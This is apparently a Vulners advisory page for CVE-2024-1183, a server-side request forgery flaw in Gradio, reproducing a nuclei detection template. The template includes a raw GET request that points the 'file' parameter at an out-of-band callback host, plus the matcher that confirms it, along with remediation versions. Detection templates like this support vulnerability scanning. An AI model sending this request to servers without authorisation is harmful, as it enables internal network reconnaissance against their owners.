Lucene search
K

Gradio - Server Side Request Forgery

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Gradio SSRF vulnerability, allows attackers to scan internal network ports by manipulating 'file' parameter in GET reques

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-1183
26 Apr 202406:04
circl
CNNVD
Gradio 输入验证错误漏洞
15 Apr 202400:00
cnnvd
CVE
CVE-2024-1183
16 Apr 202400:00
cve
Cvelist
CVE-2024-1183 SSRF Vulnerability in gradio-app/gradio
16 Apr 202400:00
cvelist
Github Security Blog
gradio Server-Side Request Forgery vulnerability
16 Apr 202400:30
github
NVD
CVE-2024-1183
16 Apr 202400:15
nvd
OSV
GHSA-QH6X-J82H-VPF9 gradio Server-Side Request Forgery vulnerability
16 Apr 202400:30
osv
Positive Technologies
PT-2024-17278 · Gradio · Gradio
15 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-1183
23 May 202510:14
redhatcve
Veracode
Server-side Request Forgery (SSRF)
18 Apr 202409:35
veracode
Rows per page
id: CVE-2024-1183

info:
  name: Gradio - Server Side Request Forgery
  author: DhiyaneshDK
  severity: medium
  description: |
    An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response.
  impact: |
    Unauthenticated attackers can perform SSRF attacks to scan and identify open ports within internal networks, potentially facilitating further attacks.
  remediation: |
    Upgrade Gradio to version 3.33 or later (for Gradio < 3.x) or version 4.11 or later (for Gradio 4.x).
  reference:
    - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4
    - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-1183
    cwe-id: CWE-601
    epss-score: 0.01784
    epss-percentile: 0.75608
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"__gradio_mode__"
    product: gradio
    vendor: gradio_project
  tags: cve,cve2024,ssrf,oast,gradio,vuln

http:
  - raw:
      - |
        GET /file=http://oast.pro HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
        part: header
# digest: 4a0a00473045022100c6281d2015e1d8631febc7a605dc519ce40b8ff347ab6250e996260c3e4da30a022029e11e1c16e752b0db858c2fe5a9742f4dd561560cca2767b6b66866b709b4a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 36.5
EPSS0.01784
SSVC
37